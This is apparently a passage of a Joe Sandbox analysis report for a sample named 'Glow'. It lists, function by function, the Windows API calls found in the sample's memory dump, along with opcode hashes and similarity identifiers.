                                                                                                                                                                          • Opcode Fuzzy Hash: 19e0291393c9394d816e7b259b96f1cc42dadb95c2c04f8fbab5d8ef6021125a
                                                                                                                                                                          • Instruction Fuzzy Hash: 3321B576A00229BF9F11DFA9CC84CFA73ACEB093647008525F909DB290DA74DC468B64
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003E81A9
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003E81CF
                                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 003E81D2
                                                                                                                                                                          • SysAllocString.OLEAUT32 ref: 003E81F3
                                                                                                                                                                          • SysFreeString.OLEAUT32 ref: 003E81FC
                                                                                                                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 003E8216
                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 003E8224
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3761583154-0
                                                                                                                                                                          • Opcode ID: 87677df1c04b00f7472e64430672a25e94bc9157f5eabd232f2aa2e4d32ef8c8
                                                                                                                                                                          • Instruction ID: cf43172a0a35dd1513580cce5afab722eac85a53b028c5ba32a995efb3c886c6
                                                                                                                                                                          • Opcode Fuzzy Hash: 87677df1c04b00f7472e64430672a25e94bc9157f5eabd232f2aa2e4d32ef8c8
                                                                                                                                                                          • Instruction Fuzzy Hash: F3217475A00158BF9B119BA9DC89DAA77ECEB093607058625FA09CB1E0DA74EC41CB64
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 003F0E99
                                                                                                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003F0ED5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateHandlePipe
                                                                                                                                                                          • String ID: nul
                                                                                                                                                                          • API String ID: 1424370930-2873401336
                                                                                                                                                                          • Opcode ID: 66fb1ba693f4162bcbda3d5a08ee77aa2e331ce9216c04f01f6367851bf6a6d0
                                                                                                                                                                          • Instruction ID: 817c9dd280454cb24b7767e07b87a9d496ab1044d28ed9a6877b30b5beaeb0dd
                                                                                                                                                                          • Opcode Fuzzy Hash: 66fb1ba693f4162bcbda3d5a08ee77aa2e331ce9216c04f01f6367851bf6a6d0
                                                                                                                                                                          • Instruction Fuzzy Hash: D0217C7450430EABDB358F28DC04EAA7BB8BF54720F204A69FEA5E72D1D770A940CB50
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 003F0F6D
                                                                                                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003F0FA8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateHandlePipe
                                                                                                                                                                          • String ID: nul
                                                                                                                                                                          • API String ID: 1424370930-2873401336
                                                                                                                                                                          • Opcode ID: aa3957a1f2f3861f04bf8ac58109b01873a2aa70212bbf536557c2575b97cd65
                                                                                                                                                                          • Instruction ID: c53e5372f920e7b894bebe4c08a4be50f9e05bb313987865a83e5ab3ded78360
                                                                                                                                                                          • Opcode Fuzzy Hash: aa3957a1f2f3861f04bf8ac58109b01873a2aa70212bbf536557c2575b97cd65
                                                                                                                                                                          • Instruction Fuzzy Hash: DF21927150034EDBDB318F68DC04AAA77E8BF55720F204A29FEA1E72D1DB709980DB50
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00387873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 003878B1
                                                                                                                                                                            • Part of subcall function 00387873: GetStockObject.GDI32(00000011), ref: 003878C5
                                                                                                                                                                            • Part of subcall function 00387873: SendMessageW.USER32(00000000,00000030,00000000), ref: 003878CF
                                                                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00414BB0
                                                                                                                                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00414BBD
                                                                                                                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00414BC8
                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00414BD7
                                                                                                                                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00414BE3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                          • String ID: Msctls_Progress32
                                                                                                                                                                          • API String ID: 1025951953-3636473452
                                                                                                                                                                          • Opcode ID: 8518e7264138458f7eadfc1a3d56309b6e707b7c9cccb874403c31a8b6fa4b1b
                                                                                                                                                                          • Instruction ID: 221d62a104e0769774257ccecd9b6845bc65bca2a9dca9cb263d4277b4eec761
                                                                                                                                                                          • Opcode Fuzzy Hash: 8518e7264138458f7eadfc1a3d56309b6e707b7c9cccb874403c31a8b6fa4b1b
                                                                                                                                                                          • Instruction Fuzzy Hash: 5A11E6B114021DBEEF119FA4CC81EEB7F5DEF08398F004111B608A2090CB75DC61DBA4
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 003BDB23: _free.LIBCMT ref: 003BDB4C
                                                                                                                                                                          • _free.LIBCMT ref: 003BDBAD
                                                                                                                                                                            • Part of subcall function 003B2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,003BDB51,00451DC4,00000000,00451DC4,00000000,?,003BDB78,00451DC4,00000007,00451DC4,?,003BDF75,00451DC4), ref: 003B2D4E
                                                                                                                                                                            • Part of subcall function 003B2D38: GetLastError.KERNEL32(00451DC4,?,003BDB51,00451DC4,00000000,00451DC4,00000000,?,003BDB78,00451DC4,00000007,00451DC4,?,003BDF75,00451DC4,00451DC4), ref: 003B2D60
                                                                                                                                                                          • _free.LIBCMT ref: 003BDBB8
                                                                                                                                                                          • _free.LIBCMT ref: 003BDBC3
                                                                                                                                                                          • _free.LIBCMT ref: 003BDC17
                                                                                                                                                                          • _free.LIBCMT ref: 003BDC22
                                                                                                                                                                          • _free.LIBCMT ref: 003BDC2D
                                                                                                                                                                          • _free.LIBCMT ref: 003BDC38
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                          • Instruction ID: 69b3349e357445cff412dbc1884be7ca96e16c441ec54551a6d357728b4be9a0
                                                                                                                                                                          • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                          • Instruction Fuzzy Hash: 1A111F73A41B04AAD522FBB0CC07FCBBBDC9F14704F414D1DB3A9AE952EA75B6048690
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memcmp
                                                                                                                                                                          • String ID: j`>
                                                                                                                                                                          • API String ID: 2931989736-513663464
                                                                                                                                                                          • Opcode ID: 7cc94086968e3dfe4c62eb13cf41af05ff436d0e82736395947047b86200f999
                                                                                                                                                                          • Instruction ID: 52218e7ca503dab931d193b58eb6f47c8ab6bfa09c906a183ee18f9577cdab75
                                                                                                                                                                          • Opcode Fuzzy Hash: 7cc94086968e3dfe4c62eb13cf41af05ff436d0e82736395947047b86200f999
                                                                                                                                                                          • Instruction Fuzzy Hash: 4C01D2F17083757B961656225C43FAB735DDE613D8F110121FD059A282E732ED10C2A4
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 003EE328
                                                                                                                                                                          • LoadStringW.USER32(00000000), ref: 003EE32F
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 003EE345
                                                                                                                                                                          • LoadStringW.USER32(00000000), ref: 003EE34C
                                                                                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003EE390
                                                                                                                                                                          Strings
                                                                                                                                                                          • %s (%d) : ==> %s: %s %s, xrefs: 003EE36D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleLoadModuleString$Message
                                                                                                                                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                          • API String ID: 4072794657-3128320259
                                                                                                                                                                          • Opcode ID: ad3b2a29363e977d930cd3fbe810930ccefdbed7d51759389ff1ec65b0b9e899
                                                                                                                                                                          • Instruction ID: 0f342e1217a70d1bc32d90904ba955e1388574bfe19d60ea829c67260672ea78
                                                                                                                                                                          • Opcode Fuzzy Hash: ad3b2a29363e977d930cd3fbe810930ccefdbed7d51759389ff1ec65b0b9e899
                                                                                                                                                                          • Instruction Fuzzy Hash: 650136F6D003187FE71197A49D89EE7776CDB08300F0185A2B746E6041E6749E844B79
                                                                                                                                                                          APIs
                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 003F1322
                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000,?), ref: 003F1334
                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,000001F6), ref: 003F1342
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 003F1350
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 003F135F
                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 003F136F
                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000000), ref: 003F1376
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3495660284-0
                                                                                                                                                                          • Opcode ID: 503f01ce88a0117df8d1c91d7811c8e0ad8bdefc09d1e63c07005c68606a155a
                                                                                                                                                                          • Instruction ID: 498611af2e476f5071c703ea1ff28945c4f7443e030c4f70d271504151c68ed7
                                                                                                                                                                          • Opcode Fuzzy Hash: 503f01ce88a0117df8d1c91d7811c8e0ad8bdefc09d1e63c07005c68606a155a
                                                                                                                                                                          • Instruction Fuzzy Hash: C6F0ECB2846616FBD7421B54EE49BD6BB39FF04302F405131F611928A0C7749571DF94
                                                                                                                                                                          APIs
                                                                                                                                                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 0040281D
                                                                                                                                                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0040283E
                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 0040284F
                                                                                                                                                                          • htons.WSOCK32(?,?,?,?,?), ref: 00402938
                                                                                                                                                                          • inet_ntoa.WSOCK32(?), ref: 004028E9
                                                                                                                                                                            • Part of subcall function 003E433E: _strlen.LIBCMT ref: 003E4348
                                                                                                                                                                            • Part of subcall function 00403C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,003FF669), ref: 00403C9D
                                                                                                                                                                          • _strlen.LIBCMT ref: 00402992
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3203458085-0
                                                                                                                                                                          • Opcode ID: 16a21606c99fe5900779dff96903b6fd513d1da91165bc3c35abe4f2cc06ad34
                                                                                                                                                                          • Instruction ID: 703f5613c6cf0e3b3e0060df649e4f8c7d6de98b27a26cb02854e7334e2b61d8
                                                                                                                                                                          • Opcode Fuzzy Hash: 16a21606c99fe5900779dff96903b6fd513d1da91165bc3c35abe4f2cc06ad34
                                                                                                                                                                          • Instruction Fuzzy Hash: 23B10171600300AFD321EF24C889E2AB7A5AF84318F54859DF4566F3E2DB75ED46CB91
                                                                                                                                                                          APIs
                                                                                                                                                                          • __allrem.LIBCMT ref: 003B042A
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003B0446
                                                                                                                                                                          • __allrem.LIBCMT ref: 003B045D
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003B047B
                                                                                                                                                                          • __allrem.LIBCMT ref: 003B0492
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003B04B0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1992179935-0
                                                                                                                                                                          • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                          • Instruction ID: 38174388120e7c39f18c2b0e8df0b67538900cfd2af7c8103bda4c51781a0067
                                                                                                                                                                          • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                          • Instruction Fuzzy Hash: 06810A756007099BD72A9E69CC45BEBB3E8AF44328F15462AF715DBE81EB70DD008B50
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,003A8649,003A8649,?,?,?,003B67C2,00000001,00000001,8BE85006), ref: 003B65CB
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,003B67C2,00000001,00000001,8BE85006,?,?,?), ref: 003B6651
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 003B674B
                                                                                                                                                                          • __freea.LIBCMT ref: 003B6758
                                                                                                                                                                            • Part of subcall function 003B3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,003A6A79,?,0000015D,?,?,?,?,003A85B0,000000FF,00000000,?,?), ref: 003B3BC5
                                                                                                                                                                          • __freea.LIBCMT ref: 003B6761
                                                                                                                                                                          • __freea.LIBCMT ref: 003B6786
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1414292761-0
                                                                                                                                                                          • Opcode ID: 290289176670c23fd69733608b0a5f929c05260a2ea9e651ca72a1e6030c71d3
                                                                                                                                                                          • Instruction ID: 13f32d386d978f193b8398cbb9d1f9a76a1e4e4f0bd37fa93999e6775ac9c54a
                                                                                                                                                                          • Opcode Fuzzy Hash: 290289176670c23fd69733608b0a5f929c05260a2ea9e651ca72a1e6030c71d3
                                                                                                                                                                          • Instruction Fuzzy Hash: 8C51E372610216ABDB268E64CC83EFB77A9EB4071CB154669FE04DA541EF38DC5086A0
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333
                                                                                                                                                                            • Part of subcall function 0040D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0040C10E,?,?), ref: 0040D415
                                                                                                                                                                            • Part of subcall function 0040D3F8: _wcslen.LIBCMT ref: 0040D451
                                                                                                                                                                            • Part of subcall function 0040D3F8: _wcslen.LIBCMT ref: 0040D4C8
                                                                                                                                                                            • Part of subcall function 0040D3F8: _wcslen.LIBCMT ref: 0040D4FE
                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0040C72A
                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0040C785
                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040C7CA
                                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0040C7F9
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0040C853
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0040C85F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1120388591-0
                                                                                                                                                                          • Opcode ID: 8278c41a87765aadba9ac13120f717e9ec267b450f8ac3f6a887df6550ca14fa
                                                                                                                                                                          • Instruction ID: a08a1ca9e7684bb0df0e86980e947c5dec79255f3e3fc74d40aec5d9958f7503
                                                                                                                                                                          • Opcode Fuzzy Hash: 8278c41a87765aadba9ac13120f717e9ec267b450f8ac3f6a887df6550ca14fa
                                                                                                                                                                          • Instruction Fuzzy Hash: AD818B71108341EFC715EF24C884E2ABBE5BF84308F1489ADF4555B2A2DB35ED06CB96
                                                                                                                                                                          APIs
                                                                                                                                                                          • VariantInit.OLEAUT32(00000035), ref: 003E00A9
                                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 003E0150
                                                                                                                                                                          • VariantCopy.OLEAUT32(003E0354,00000000), ref: 003E0179
                                                                                                                                                                          • VariantClear.OLEAUT32(003E0354), ref: 003E019D
                                                                                                                                                                          • VariantCopy.OLEAUT32(003E0354,00000000), ref: 003E01A1
                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 003E01AB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
